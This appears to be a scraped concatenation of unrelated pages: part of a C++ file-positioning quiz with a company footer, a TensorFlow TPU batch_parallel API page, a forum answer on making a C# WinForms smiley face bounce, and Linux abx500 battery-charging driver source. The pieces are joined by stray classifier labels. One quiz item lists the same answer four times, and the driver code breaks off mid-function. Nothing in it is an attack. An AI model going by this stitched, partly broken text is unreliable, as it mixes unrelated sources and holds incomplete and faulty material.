public:
TestTimeDataLoader() = default;
protected:
ErrCode startImpl(const std::string& content, const std::string& path) override
{
setOutputCaps("ds3d/datamap");
return ErrCode::kGood;
}
ErrCode readDataImpl(GuardDataMap& datamap) override
{
datamap.reset(NvDs3d_CreateDataHashMap());
static uint64_t iTime = 0;
TimeStamp t{iTime++, 0, 0};
datamap.setData("time", t);
emitError(ErrCode::kGood, "timstamp added");
return ErrCode::kGood;
}
ErrCode stopImpl() override { return ErrCode::kGood; }
ErrCode flushImpl() override { return ErrCode::kGood; }
};
DS3D_EXTERN_C_BEGIN
DS3D_EXPORT_API abiRefDataLoader*
createTestTimeDataloader()
{
return NewAbiRef<abiDataLoader>(new TestTimeDataLoader);
}
DS3D_EXTERN_C_END
A shown in the example above, You’ll need to derive dataloader from the ds3d::impl::SyncImplDataLoader class, and implement interfaces for the following:
ErrCode startImpl(const std::string& content, const std::string& path) override;
ErrCode readDataImpl(GuardDataMap& datamap) override;
ErrCode stopImpl() override;
ErrCode flushImpl() override;
To load this custom lib through NvDs3D_CreateDataLoaderSrc, you’ll also need to export createTestTimeDataloader.
ds3d::datafilter- Loads Custom Lib for Input and Output Processing
Load And Manage Datafilter
Examples:
name: point2cloud_datafilter
type: ds3d::datafilter
in_caps: ds3d/datamap
out_caps: ds3d/datamap
custom_lib_path: libnvds_3d_depth2point_datafilter.so
custom_create_function: createDepth2PointFilter
config_body:
A custom datafilter must have type: ds3d::datafilter. It is loaded through the nvds3dfilter Gst-plugin. It is started by gst_element_set_state(GST_STATE_READY). During this call, the custom_lib_path is loaded and a specific data filter is created by custom_create_function. nvds3dfilter Gst-plugin has config-content and config-file properties. One of them must be set to create a datafilter object.
Datafilter in User Application
Examples:
#include <ds3d/common/hpp/datafilter.hpp>
GuardDataFilter datafilter;
datafilter.reset(createTestFakeDatafilter()); # create a specific ABI
ErrCode c = datafilter.setErrorCallback([](ErrCode c, const char*){});
c = datafilter.start(yamlconfig); // check result.
int consumedNum = 0;
auto dataConsumed = [&consumedNum](ErrCode c, const abiRefDataMap* data) {
if (isGood(c)) {
++consumedNum;
}
};
for (int i = 0; i < 100; ++i) {
TimeStamp t{i, 0, 0};
GuardDataMap dataIn;
dataIn.reset(NvDs3d_CreateDataHashMap());
dataIn.setData("time", t);
GuardDataMap dataOut;
ErrCode cbCode = ErrCode::kGood;
auto outputCB = [&dataOut, &cbCode](ErrCode c, const abiRefDataMap* data) {
cbCode = c;
if (data) {
GuardDataMap newData(*data);
dataOut = newData;
}
};
c = dataFilter.process(dataIn, dataConsumed, outputCB);
}
c = datafilter.flush();
c = datafilter.stop();
GuardDataFilter provides safe access to the abiDataFilter. Once it’s created, it will maintain the reference pointer to datafilter.
Implement a Custom Datafilter
Examples:
#include <ds3d/common/impl/impl_datafilter.h>
class TestFakeDataFilter : public impl::BaseImplDataFilter {
public:
TestFakeDataFilter() = default;
protected:
ErrCode startImpl(const std::string& content, const std::string& path) override
{
setInputCaps(kFakeCapsMetaName);
setOutputCaps(kFakeCapsMetaName);
return ErrCode::kGood;
}
ErrCode processImpl(
GuardDataMap datamap, OnGuardDataCBImpl outputDataCb,
OnGuardDataCBImpl inputConsumedCb) override
{
DS_ASSERT(datamap);
TimeStamp t;
ErrCode c = datamap.getData("time", t);
if (!isGood(c)) {
return c;
}
t.t0 += 1;
inputConsumedCb(ErrCode::kGood, datamap);
c = datamap.setData("time", t);
if (!isGood(c)) {
return c;
}
outputDataCb(ErrCode::kGood, datamap);
return ErrCode::kGood;
}
ErrCode flushImpl() override { return ErrCode::kGood; }
ErrCode stopImpl() override { return ErrCode::kGood; }
};
DS3D_EXTERN_C_BEGIN
DS3D_EXPORT_API abiRefdatafilter*
createTestFakeDatafilter()
{
return NewAbiRef<abidatafilter>(new TestFakeDataFilter);
}
DS3D_EXTERN_C_END
As shown in the example above, you’ll need to derive the datafilter from the ds3d::impl::BaseImplDataFilter class, and implement interfaces for the following:
ErrCode startImpl(const std::string& content, const std::string& path) override;
ErrCode processImpl(
GuardDataMap datamap, OnGuardDataCBImpl outputDataCb,
OnGuardDataCBImpl inputConsumedCb) override;
ErrCode stopImpl() override;
ErrCode flushImpl() override;
To load this custom lib through nvds3dfilter Gst-plugin, you’ll also need to export a specific symbol createTestFakeDatafilter.
ds3d::datarender - Loads Custom Lib for Data Rendering
Load And Manage Datarender
Examples:
name: point-render
type: ds3d::datarender
in_caps: ds3d/datamap
custom_lib_path: libnvds_3d_gl_datarender.so
custom_create_function: createPointCloudDataRender
config_body:
title: ds3d-point-cloud-test
A custom datarender must have type: ds3d::datarender. It is created by explicit call of NvDs3D_CreateDataRenderSink(sinkConfig, renderSink, start) with the full compoment YAML content. During this call, the custom_lib_path is loaded and a specific data loader is created via custom_create_function. A GstAppsink object is also created into renderSink.gstElement.
GstAppsink manages the ds3d::datarender dataflows. This ds3d::datarender component could be automatically started by the gst-pipeline, or manually by the application call.
GuardDataRender datarender = renderSink.customProcessor;
ErrCode c = datarender.start();
To stop the datarender, you can set GstAppsink states to GST_STATE_READY, or stop manually.
GuardDataRender datarender = renderSink.customProcessor;
ErrCode c = datarender.stop();
Datarender in User Application
Examples:
#include <ds3d/common/hpp/datarender.hpp>
GuardDataRender datarender;
datarender.reset(createTestFakedatarender());
ErrCode c = datarender.setErrorCallback([](ErrCode c, const char*){});
c = datarender.start(yamlconfig); // check result.
for (int i = 0; i < 100; ++i) {
static uint64_t iTime = 0;
TimeStamp t{iTime++, 0, 0};
GuardDataMap datamap;
datamap.reset(NvDs3d_CreateDataHashMap());
ASSERT_TRUE(datamap);
datamap.setData("time", t);
if (i == 0) {
c = dataRender.preroll(datamap);
}
ErrCode c = dataRender.render(datamap, dataRenderd);
}
c = datarender.flush();
c = datarender.stop();
GuardDataRender provides safe access to abidatarender. Once it’s created, it will maintain the reference pointer to datarender. preroll is called only once to initialize some resources.
Implement a Custom Datarender
Examples:
#include <ds3d/common/impl/impl_datarender.h>
class TestFakeDataRender : public impl::BaseImplDataRender {
public:
TestFakeDataRender() = default;
protected:
ErrCode startImpl(const std::string& content, const std::string& path) override
{
setInputCaps("ds3d/datamap");
return ErrCode::kGood;
}
ErrCode prerollImpl(GuardDataMap datamap) override { return ErrCode::kGood; }
ErrCode renderImpl(GuardDataMap datamap, OnGuardDataCBImpl dataDoneCb) override
{
DS_ASSERT(datamap);
emitError(ErrCode::kGood, "data rendered");
dataDoneCb(ErrCode::kGood, datamap);
return ErrCode::kGood;
}
ErrCode flushImpl() override { return ErrCode::kGood; }
ErrCode stopImpl() override { return ErrCode::kGood; }
};
DS3D_EXTERN_C_BEGIN
DS3D_EXPORT_API abiRefdatarender*
createTestFakedatarender()
{
return NewAbiRef<abiDataRender>(new TestFakeDataRender());
}
DS3D_EXTERN_C_END
As shown in the example above, you’ll need to derive datarender from the ds3d::impl::BaseImplDataRender class, and implement interfaces for the following:
ErrCode startImpl(const std::string& content, const std::string& path) override;
ErrCode prerollImpl(GuardDataMap datamap) override;
ErrCode renderImpl(GuardDataMap datamap, OnGuardDataCBImpl dataDoneCb) override;
ErrCode stopImpl() override;
ErrCode flushImpl() override;
To load this custom lib through NvDs3D_CreateDataRenderSink, you’ll also need to export a specific symbol createTestFakedatarender.
DS3D GuardDataMap Buffer Management
DS3D Data Map Read
DS3D defines class objects ds3d::abiRefDataMap. All internal data are hash and stored into this data map. NvDs3DBuffer is defined to store the 3D datamap into GstBuffer. Header file is nvds3d_meta.h.
struct NvDs3DBuffer {
uint32_t magicID; // must be 'DS3D'
ds3d::abiRefDataMap* datamap;
};
Warning
Do not use the datamap directly. The easy and safe way to access that is through GuardDataMap. See sample code in :doc: DS_3D_Depth_Camera.
Example:
#include <ds3d/common/hpp/datamap.hpp>
#include <ds3d/common/hpp/frame.hpp>
if (NvDs3D_IsDs3DBuf(gstBuf)) {
const abiRefDataMap* refDataMap = nullptr;
ErrCode c = NvDs3D_Find1stDataMap(gstBuf, refDataMap);
... // check error code
if (refDataMap) {
GuardDataMap dataMap(*refDataMap);
FrameGuard pointFrame;
c = dataMap.getGuardData(kPointXYZ, pointFrame); // get 3D points reference.
... // check error code
FrameGuard uvCoord;
c = dataMap.getGuardData(kPointCoordUV, uvCoord); // get 3D points UV coordinates reference.
... // check error code
Frame2DGuard depthFrame;
c = dataMap.getGuardData(kDepthFrame, depthFrame); // get depth frame reference.
... // check error code
DepthScale scale;
c = dataMap.getData(kDepthScaleUnit, scale); // copy depth scale
... // check error code
}
}
DS3D Data Map Write
Create an empty datamap, store some frames into this datamap. Example:
#include <ds3d/common/hpp/datamap.hpp>
#include <ds3d/common/hpp/frame.hpp>
#include <ds3d/common/impl/impl_frames.h>
GuardDataMap datamap(NvDs3d_CreateDataHashMap(), true); // set true to take the reference ownership.
/* Create depth frame and store them into ds3d datamap. */
// Assume depth datatype: Uint16
{
Frame2DPlane depthPlane = {640, 480, 640 * sizeof(uint16_t) , sizeof(uint16_t), 0};
uint32_t depthBytesPerFrame = depthPlane.pitchInBytes * depthPlane.height;
std::vector<uint8_t> data(depthBytesPerFrame); // Depth data
void* dataPtr = &data[0];
// create depth 2D frame
Frame2DGuard depthFrame = Wrap2DFrame<uint16_t, FrameType::kDepth>(
dataPtr, depthPlane}, depthBytesPerFrame, MemType::kCpu, 0,
[data = std::move(data)](void*) {});
c = datamap.setGuardData(kDepthFrame, depthFrame); // store depthFrame reference into datamap.
... // check error code
DepthScale scale{0.001, {nullptr}}; //
c = datamap.setData(kDepthScaleUnit, scale); // copy depth scale into datamap.
... // check error code
}
/* Create color image frame and store them into ds3d datamap. */
// Assume format is RGBA
{
Frame2DPlane colorPlane = {1920, 1080, 1920 * sizeof(uint8_t) , sizeof(uint8_t), 0};
uint32_t colorBytesPerFrame = colorPlane.pitchInBytes * colorPlane.height;
std::vector<uint8_t> data(colorBytesPerFrame); // Image data
void* dataPtr = &data[0];
// create color 2D frame
Frame2DGuard frame = Wrap2DFrame<uint8_t, FrameType::kColorRGBA>(
dataPtr, {_config.colorPlane}, bytesPerFrame, MemType::kCpu, 0,
[data = std::move(data)](void*) {});
c = datamap.setGuardData(kColorFrame, colorFrame); // store colorFrame reference into datamap.
... // check error code
}
/* Create 3D points frame and store them into ds3d datamap. */
{
uint32_t pointNum = 640 * 480;
std::vector<vec3f> points(pointNum); // 3D points data
vec3f* pointPtr = &points[0];
FrameGuard pointsFrame = wrapPointXYZFrame<float>(
(void*)pointPtr, pointNum, MemType::kCpu, 0, [points = std::move(points)](void*) {});
c = datamap.setGuardData(kPointXYZ, pointXyzFrame); // store 3d-points XYZ data reference into datamap.
... // check error code
std::vector<vec3f> uvData(pointNum); // 3D points data
vec3f* uvPtr = &data[0];
FrameGuard pointUvCoord = wrapPointCoordUVFrame<float>(
(void*)uvPtr, pointNum, MemType::kCpu, 0, [uvData = std::move(uvData)](void*) {});
c = datamap.setGuardData(kPointCoordUV, pointUvCoord); // store 3d-points UV coordinate data reference into datamap.
... // check error code
}
The example below shows how to Create a new GstBuffer with ds3d datamap.
// Assume ``GuardDataMap datamap`` is ready
GstBuffer* gstBuf = nullptr;
ErrCode c = NvDs3D_CreateGstBuf(gstBuf, datamap.abiRef(), false); // set false to increase reference count.
... // check error code
Example below shows how to update an existing DS3D GstBuffer with new ds3d datamap.
// Assume ``GuardDataMap datamap`` is ready
// Assume ``GstBuffer* gstBuf`` is created by another compoment
ErrCode c = NvDs3D_UpdateDataMap(gstBuf, datamap.abiRef(), false); // set false to increase reference count.
... // check error code
Custom Libs Configuration Specifications
Components Common Configuration Specifications
ds3d common configuration specifications
Property
Meaning
Type and Range
Example
type
Custom processor type
String, [ds3d::dataloader, ds3d::datafilter, ds3d::datarender]
type: ds3d::dataloader
name
Indicate user-defined component name
String
name: depthloader
in_caps
Indicate Gst sink caps for the component
String
in_caps: ds3d/datamap
out_caps
Indicate Gst sink caps for the component
String
out_caps: ds3d/datamap
custom_lib_path
Indicate custom lib path
String
custom_lib_path: libnvds_3d_gl_datarender.so
custom_create_function
Indicate custom function to create the specific ds3d processing component
String
custom_create_function: createPointCloudDataRender
config_body
Indicate YAML specific content for the custom comonent
String
config_body:
in_streams: [color, depth] max_points: 407040
libnvds_3d_dataloader_realsense Configuration Specifications
Configuration for Realsense Dataloader Header:
name: realsense_dataloader
type: ds3d::dataloader
out_caps: ds3d/datamap
custom_lib_path: libnvds_3d_dataloader_realsense.so
custom_create_function: createRealsenseDataloader
libnvds_3d_dataloader_realsense.so requires you to install librealsense2 SDK. For x86, follow the instructions from https://github.com/IntelRealSense/librealsense/blob/master/doc/distribution_linux.md. For Jetson platform, follow the instructions from https://github.com/IntelRealSense/librealsense/blob/master/doc/installation_jetson.md.
libnvds_3d_dataloader_realsense config_body fields
Property
Meaning
Type and Range
Example
streams
Specify which streams to enable
List[String], select from [color, depth]
streams: [color, depth]
aligned_image_to_depth
Indicate whether color image is aligned to depth
Boolean
aligned_image_to_depth: False
libnvds_3d_depth2point_datafilter Configuration Specifications
Configuration for Depth to Points Header:
name: depth2points
type: ds3d::datafilter
in_caps: ds3d/datamap
out_caps: ds3d/datamap
custom_lib_path: libnvds_3d_depth2point_datafilter.so
custom_create_function: createDepth2PointFilter
libnvds_3d_depth2point_datafilter config_body fields
Property
Meaning
Type and Range
Example
streams
Specify which streams to enable
List[String], select from [color, depth]
streams: [color, depth]
max_points
Indicate maximum 3d points to allocate
Uint32
max_points: 407040
mem_pool_size
Indicate max buffer pool size
Uint32
mem_pool_size: 8
libnvds_3d_gl_datarender Configuration Specifications
Configuration Common header for libnvds_3d_gl_datarender:
name: depth-point-render
type: ds3d::datarender
in_caps: ds3d/datamap
custom_lib_path: libnvds_3d_gl_datarender.so
Configuration Body for Common Part:
libnvds_3d_gl_datarender config_body common fields
Property
Meaning
Type and Range
Example
title
Specify window title
String
title: ds3d-point-cloud-test
streams
Indicate which streams to render. depth render must have [depth], 3D points render must have [points]
List[String], select from [color, depth, points]
streams: [color, depth]
width
Specify window width
UINT32
width: 1280
height
Specify window height
UINT32
height: 720
block
Indicate rendering thread as block mode
Boolean
block: True
Configuration Header for Point Cloud Render:
name: point-3D-render
type: ds3d::datarender
in_caps: ds3d/datamap
custom_lib_path: libnvds_3d_gl_datarender.so
custom_create_function: createPointCloudDataRender # specific function for 3D point rendering
Configuration Header for Lidar data Render:
name: lidar-data-render
type: ds3d::datarender
in_caps: ds3d/datamap
custom_lib_path: libnvds_3d_gl_datarender.so
custom_create_function: createLidarDataRender # specific function for Lidar point cloud rendering
Configuration Body for 3D Point Cloud and Lidar Render Part:
For more details on 3D coordinate system, refer to https://learnopengl.com/Getting-started/Coordinate-Systems. To know the value meanings for view_position, view_target and view_up,refer to the gluLookAt here: https://www.khronos.org/registry/OpenGL-Refpages/gl2.1/xhtml/gluLookAt.xml. To know the value meanings for near, far and fov, refer to the gluPerspective here: https://www.khronos.org/registry/OpenGL-Refpages/gl2.1/xhtml/gluPerspective.xml.
libnvds_3d_gl_datarender Point Cloud Render config_body Fields
Property
Meaning
Type and Range
Example
view_position
Specify view position [x, y, z]coordinates
List[Float]
view_position: [0, 0, -1]
view_target
Specify view target [x, y, z]coordinates
List[Float]
view_target: [0, 0, 1]
view_up
Specify view up direction [x, y, z]coordinates
List[Float]
view_up: [0, -1.0, 0]
near
Specify perspective projection near plane
Float
near: 0.01
far
Specify perspective projection far plane
Float
far: 10.0
fov
Specify perspective projection field of view, degree angle
Float
fov: 40.0
coord_y_opposite
Specify texture map V direction, Realsense coordinates is different from GLES default coordinates
Boolean
coord_y_opposite: False
positive_z_only
Specify whether display negtive depth values
Boolean
positive_z_only: False
Configuration Body for Lidar Render Specific Part:
libnvds_3d_gl_datarender Lidar Render extra config_body Fields
Property
Meaning
Type and Range
Example
view_position
Specify view position [x, y, z]coordinates
List[Float]
view_position: [0, 0, -1]
view_target
Specify view target [x, y, z]coordinates
List[Float]
view_target: [0, 0, 1]
view_up
Specify view up direction [x, y, z]coordinates
List[Float]
view_up: [0, -1.0, 0]
near
Specify perspective projection near plane
Float
near: 0.01
far
Specify perspective projection far plane
Float
far: 10.0
fov
Specify perspective projection field of view, degree angle
Float
fov: 40.0
lidar_color
Specify lidar data color for display
List[Uint32]
lidar_color: [0, 255, 0]
element_size
Specify lidar data element size. e.g. 4 for XYZI or 3 for XYZ
Uint32
element_size: 4
lidar_data_key
Specify lidar data frame in datamap, default value is DS3D::LidarXYZI
String
lidar_data_key: DS3D::LidarXYZI
lidar_bbox_key
Specify lidar 3D bounding box data in datamap, default value is DS3D::Lidar3DBboxRawData
String
lidar_bbox_key: DS3D::Lidar3DBboxRawData
Configuration Header for Depth and Color 2D Render:
name: depth-2D-render
type: ds3d::datarender
in_caps: ds3d/datamap
custom_lib_path: libnvds_3d_gl_datarender.so
custom_create_function: createDepthStreamDataRender # specific function for 2D depth rendering
Configuration Body for Depth and Color 2D Specific Part:
libnvds_3d_gl_datarender 2D Depth Render config_body Fields
Property
Meaning
Type and Range
Example
min_depth
Specify minimum depth value. other values less that it will be removed in rendering
Float
min_depth: 0.3
max_depth
Specify maximum depth value. other values less that it will be removed in rendering
Float
max_depth: 2.0
min_depth_color
Specify minimum depth rendering color in [R, G, B]
List[Uint32]
min_depth_color: [255, 128, 0]
max_depth_color
Specify maximum depth rendering color in [R, G, B]
Float
max_depth_color: [0, 128, 255]
libnvds_3d_depth_datasource Depth file source Specific Configuration Specifications
Configuration header:
name: depthfilesource
type: ds3d::dataloader
out_caps: ds3d/datamap, framerate=30/1
custom_lib_path: libnvds_3d_depth_datasource.so
custom_create_function: createDepthColorLoader
Configuration body:
libnvds_3d_depth_datasource Depth file source config_body Fields
Property
Meaning
Type and Range
Example
depth_source
Specify file path for depth source
String
depth_source: depth_uint16_640x480.bin
color_source
Specify file path for color image source
String
color_source: color_rgba_1920x1080.bin
depth_scale
Indicate depth unit in meters per each depth value
Float
depth_scale: 0.0010
depth_datatype
Indicate depth datatype, only [uint16] is supported for this version
String, Values must be uint16
depth_datatype: uint16
depth_size
Indicate depth resolutions in [width, height]
List[Uint32], must be [width, height]
depth_size: [640, 480]
color
Indicate color format. only rgba is supported
String. Value must be rgba
color: rgba
color_size
Indicate color resolutions in [width, height]
List[Uint32], must be [width, height]
color_size: [1920, 1080]
depth_intrinsic
Indicate depth sensor intrinsic parameter groups
Intrinsic Configuration Group
depth_intrinsic:
width: 848 height: 480 centerX: 424.06073 centerY: 237.75032 fx: 422.513062 fy: 422.513062
color_intrinsic
Indicate color sensor intrinsic parameter groups
Intrinsic Configuration Group
color_intrinsic:
width: 1920 height: 1080 centerX: 964.288086 centerY: 533.287354 fx: 1358.21423 fy: 1358.2533
depth_to_color_extrinsic
Indicate extrinsic parameters from depth sensor to color sensor
Extrinsic Configuration Group
depth_to_color_extrinsic:
rotation: [1, -0.0068, 0.0010, 0.0068, 1, 0, -0.0010, 0, 1] translation: [0.01481, -0.0001, 0.0002]
Configuration Body for Intrinsic Parameters :
libnvds_3d_depth_datasource Intrinsic Parameters in Depth file source config_body Fields
Property
Meaning
Type and Range
Example
width
Specify sensor width in pixels
Uint32
width: 848
height
Specify sensor height in pixels
Uint32
height: 480
centerX
Specify coordinate axis position in pixels in horizontal direction
Float
centerX: 424.06
centerY
Specify coordinate axis position in pixels in vertical direction
Float
centerY: 533.28
fx
Specify focal length in pixels in X direction
Float
fx: 1358.21
fy
Specify focal length in pixels in Y direction
Float
fy: 1358.25
Configuration Body for Extrinsic Parameters:
libnvds_3d_depth_datasource Extrinsic Parameters in Depth file source config_body Fields
Property
Meaning
Type and Range
Example
rotation
Specify an extrinsic 3x3 matrix for rotation. Values in Column-major order
List[Float], Values in Column-major order
rotation: [1, -0.0068, 0.0010, 0.0068, 1, 0, -0.0010, 0, 1]
translation
Specify an extrinsic 3x1 matrix for translation. Values in Column-major order
List[Float], Values in Column-major order
translation: [0.01481, -0.0001, 0.0002]
|
__label__pos
| 0.611885 |
Relationship between Publish button and Vercel hosted code
It seems odd to use the Publish feature when trying to update Plasmic Studio with my Versel hosted code. In fact I now have an error. To proceed, am I forced to configure my project to localhost:3000.
Am I suppose to use https://vercel.com/docs/cli. There is a Plasmic CLI but it’s only about “code generation of Plasmic components”
And is there a quicker way to switch between Localhost and Versel?
image.png
not sure what you mean, but you shouldn’t need to publish if you’re just trying to register some new code components
Well, when my project was configured to local host. I could edit my code and see the change instantly in Plasmic.
This was great, but no develop could access my project, so was asked by @icaro to deploy to Vercel, and I assumed configure the project to point to Versal.
Now that my project points to Versel, do I still use localhost, if so how? Or does each Studio user have independent project configuration, so can choose to point to Versal or Localhost without effecting other user setting?
If all users are effected by my Project configuration and I have to point to Vercel. Then How do I edit code and see my change instantly in Plasmic, like I did with localhost?
My bad. I see my edit appear in Plasmic via Versel it just takes a minute or 2. Versel must be watching for changes on github.
Still, this is an issue as I want to work locally, before pushing to github.
Am I missing something?
|
__label__pos
| 0.623433 |
Beefy Boxes and Bandwidth Generously Provided by pair Networks
Your skill will accomplish
what the force of many cannot
PerlMonks
Comment on
( #3333=superdoc: print w/ replies, xml ) Need Help??
Or just store the original key as the value of the canonicalized (lower-cased) hash. Look up in the lower case hash to find the key, then use the value of that hash to look up the value in the original hash.
#! /usr/bin/perl %hash1 = ("John", 43, "Paul", 25, "Marie", 22); %hash2 = ("john", 43, "Paul", 25, "marie", 22); my %lc_hash1 = map { lc $_ => $_ } keys %hash1; while (($KEY_2, $VALUE_2) = each %hash2){ if (exists $lc_hash1{lc $KEY_2}){ print "$KEY_2 : Matched\n"; print "Keys are: $lc_hash1{lc $KEY_2}, $KEY_2\n"; print "Values are: $hash1{$lc_hash1{lc $KEY_2}}, $VALUE_2\n"; } else{ print "$KEY_2 : Did not match\n"; } }
In reply to Re^2: Ignore Case when comparing Hash Keys by ctilmes
in thread Ignore Case when comparing Hash Keys by avidcoder
Title:
Use: <p> text here (a paragraph) </p>
and: <code> code here </code>
to format your post; it's "PerlMonks-approved HTML":
• Posts are HTML formatted. Put <p> </p> tags around your paragraphs. Put <code> </code> tags around your code and data!
• Read Where should I post X? if you're not absolutely sure you're posting in the right place.
• Please read these before you post! —
• Posts may use any of the Perl Monks Approved HTML tags:
a, abbr, b, big, blockquote, br, caption, center, col, colgroup, dd, del, div, dl, dt, em, font, h1, h2, h3, h4, h5, h6, hr, i, ins, li, ol, p, pre, readmore, small, span, spoiler, strike, strong, sub, sup, table, tbody, td, tfoot, th, thead, tr, tt, u, ul, wbr
• Outside of code tags, you may need to use entities for some characters:
For: Use:
& &
< <
> >
[ [
] ]
• Link using PerlMonks shortcuts! What shortcuts can I use for linking?
• See Writeup Formatting Tips and other pages linked from there for more info.
• Log In?
Username:
Password:
What's my password?
Create A New User
Chatterbox?
and the web crawler heard nothing...
How do I use this? | Other CB clients
Other Users?
Others exploiting the Monastery: (11)
As of 2014-09-19 17:31 GMT
Sections?
Information?
Find Nodes?
Leftovers?
Voting Booth?
How do you remember the number of days in each month?
Results (143 votes), past polls
|
__label__pos
| 0.782701 |
Measuring number and count of allocations
I would like to do some simple measurements of allocations. Basically create a collection of size N for various data structures, then measure the number of temporary and persistent allocations.
Ideally I would love to have something like criterion, but for memory. But since that does not seem to exist, something where I can just write a small test program that dumps a CSV for gnuplot would do as well.
There used to be a crate https://crates.io/crates/heapsize that at least allowed you to measure the total size of an object. But it is no longer supported and does not work with the current default allocator in any case.
Any recommendations how to accomplish this in current rust?
I don’t know if there’s a crate that already does this, but you could replace the default allocator with one that collects the statistics you want. There’s an example that does this in the alloc::System docs.
1 Like
stats_alloc adds hooks to the global allocator to count allocs and deallocs.
3 Likes
Thanks. That is what I am currently doing. Basically configure jemalloc and then measure per-thread allocations using jemalloc-ctl. Seems to work fine after some twiddling.
Swapping in a new allocator is surprisingly easy. I love rust.
Cool. Will check it out once I am done with playing with jemalloc-ctl.
|
__label__pos
| 0.845604 |
blob: cc217b22dccd1856c1b77db9d6476e21417da1c7 [file] [log] [blame]
Broadcom BCM7038-style Level 1 interrupt controller
This block is a first level interrupt controller that is typically connected
directly to one of the HW INT lines on each CPU. Every BCM7xxx set-top chip
since BCM7038 has contained this hardware.
Key elements of the hardware design include:
- 64, 96, 128, or 160 incoming level IRQ lines
- Most onchip peripherals are wired directly to an L1 input
- A separate instance of the register set for each CPU, allowing individual
peripheral IRQs to be routed to any CPU
- Atomic mask/unmask operations
- No polarity/level/edge settings
- No FIFO or priority encoder logic; software is expected to read all
2-5 status words to determine which IRQs are pending
Required properties:
- compatible: should be "brcm,bcm7038-l1-intc"
- reg: specifies the base physical address and size of the registers;
the number of supported IRQs is inferred from the size argument
- interrupt-controller: identifies the node as an interrupt controller
- #interrupt-cells: specifies the number of cells needed to encode an interrupt
source, should be 1.
- interrupt-parent: specifies the phandle to the parent interrupt controller(s)
this one is cascaded from
- interrupts: specifies the interrupt line(s) in the interrupt-parent controller
node; valid values depend on the type of parent interrupt controller
If multiple reg ranges and interrupt-parent entries are present on an SMP
system, the driver will allow IRQ SMP affinity to be set up through the
/proc/irq/ interface. In the simplest possible configuration, only one
reg range and one interrupt-parent is needed.
Example:
periph_intc: periph_intc@1041a400 {
compatible = "brcm,bcm7038-l1-intc";
reg = <0x1041a400 0x30 0x1041a600 0x30>;
interrupt-controller;
#interrupt-cells = <1>;
interrupt-parent = <&cpu_intc>;
interrupts = <2>, <3>;
};
|
__label__pos
| 0.801812 |
allensdk.internal.morphology.validate_swc module
class allensdk.internal.morphology.validate_swc.TestNode(n, t, x, y, z, r, pn)[source]
Bases: object
allensdk.internal.morphology.validate_swc.main()[source]
allensdk.internal.morphology.validate_swc.resave_swc(orig_swc, new_file)[source]
Reads SWC file into AllenSDK Morphology object and resaves it. This can fix some problems in an SWC file that may disrupt other software tools reading the file (e.g., NEURON)
Parameters:
orig_swc: string
Name of SWC file to read
new_file: string
Name of output SWC file
allensdk.internal.morphology.validate_swc.validate_swc(swc_file)[source]
Tests SWC files for compatibility with AllenSDK
To be compatible with NEURON, SWC files must have the following properties:
1. a single root node with parent ID ‘-1’
2. sequentially increasing ID numbers
3. immediate children of the soma cannot branch
To be compatible with feature analysis, SWC files can only have node types in the range 1-4:
1 = soma 2 = axon 3 = [basal] dendrite 4 = apical dendrite
|
__label__pos
| 0.983531 |
Your search did not match any results.
Bar Gauge
Variable Number of Bars
Documentation
This demo shows how to use the API of the BarGauge to change the number of indicated values at runtime. For this purpose, an array of new values is passed as the parameter of the value method.
Backend API
Copy to CodePen
Apply
Reset
$(() => { const productsToValues = function () { return $.map(products, (item) => (item.active ? item.count : null)); }; const gauge = $('#gauge').dxBarGauge({ startValue: 0, endValue: 50, values: productsToValues(), label: { format: { type: 'fixedPoint', precision: 0, }, }, }).dxBarGauge('instance'); $('#panel').append($.map(products, (product) => $('<div></div>').dxCheckBox({ value: product.active, text: product.name, onValueChanged(data) { product.active = data.value; gauge.values(productsToValues()); }, }))); });
<!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>DevExtreme Demo</title> <meta http-equiv="X-UA-Compatible" content="IE=edge" /> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0" /> <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script> <script>window.jQuery || document.write(decodeURIComponent('%3Cscript src="js/jquery.min.js"%3E%3C/script%3E'))</script> <link rel="stylesheet" type="text/css" href="https://cdn3.devexpress.com/jslib/22.1.4/css/dx.common.css" /> <link rel="stylesheet" type="text/css" href="https://cdn3.devexpress.com/jslib/22.1.4/css/dx.light.css" /> <script src="https://cdn3.devexpress.com/jslib/22.1.4/js/dx.all.js"></script> <script src="data.js"></script> <link rel="stylesheet" type="text/css" href="styles.css" /> <script src="index.js"></script> </head> <body class="dx-viewport"> <div class="demo-container"> <div class="long-title"><h3>Sampling by Goods</h3></div> <div id="gauge-demo"> <div id="gauge"></div> <div id="panel"></div> </div> </div> </body> </html>
#gauge-demo { height: 440px; width: 100%; } #gauge { width: 80%; height: 100%; margin-top: 20px; float: left; } #panel { width: 150px; text-align: left; margin-top: 20px; float: left; } .dx-checkbox { margin-bottom: 10px; display: block; } .long-title h3 { font-weight: 200; font-size: 28px; text-align: center; margin-bottom: 20px; }
const products = [{ name: 'Hammers', count: 41, active: true, }, { name: 'Shovels', count: 32, active: true, }, { name: 'Ladders', count: 13, active: true, }, { name: 'Watering cans', count: 48, active: true, }, { name: 'Screwdrivers', count: 24, active: true, }, { name: 'Nail pullers', count: 8, active: true, }, { name: 'Drills', count: 19, active: true, }];
|
__label__pos
| 0.82035 |
.NET 4.0 And Our Parallel Future
I want to show you an algorithm, it is a pretty simple algorithm. It is an implementation of the Damerau–Levenshtein edit distance algorithm from the pseudocode on Wikipedia:
public static int EditDistance(string string1, string string2)
{
var s1Length = string1.Length;
var s2Length = string2.Length;
var matrix = new int[s1Length + 1, s2Length + 1];
for (int i = 0; i <= s1Length; i++)
matrix[i, 0] = i;
for (int j = 0; j <= s2Length; j++)
matrix[0, j] = j;
for (int i = 1; i <= s1Length; i++)
{
for (int j = 1; j <= s2Length; j++)
{
int cost = (string2[j - 1] == string1[i - 1]) ? 0 : 1;
matrix[i, j] = (new[] { matrix[i - 1, j] + 1,
matrix[i, j - 1] + 1,
matrix[i - 1, j - 1] + cost}).Min();
if ((i > 1) && (j > 1) &&
(string1[i - 1] == string2[j - 2]) &&
(string1[i - 2] == string2[j - 1]))
{
matrix[i, j] = Math.Min(
matrix[i, j],
matrix[i - 2, j - 2] + cost);
}
}
}
return matrix[s1Length, s2Length];
}
And I plan to use it to load up a word list:
var words = new List<string>();
using (var streamReader = new StreamReader("english-words.95"))
{
string line;
while ((line = streamReader.ReadLine()) != null)
{
words.Add(line);
}
}
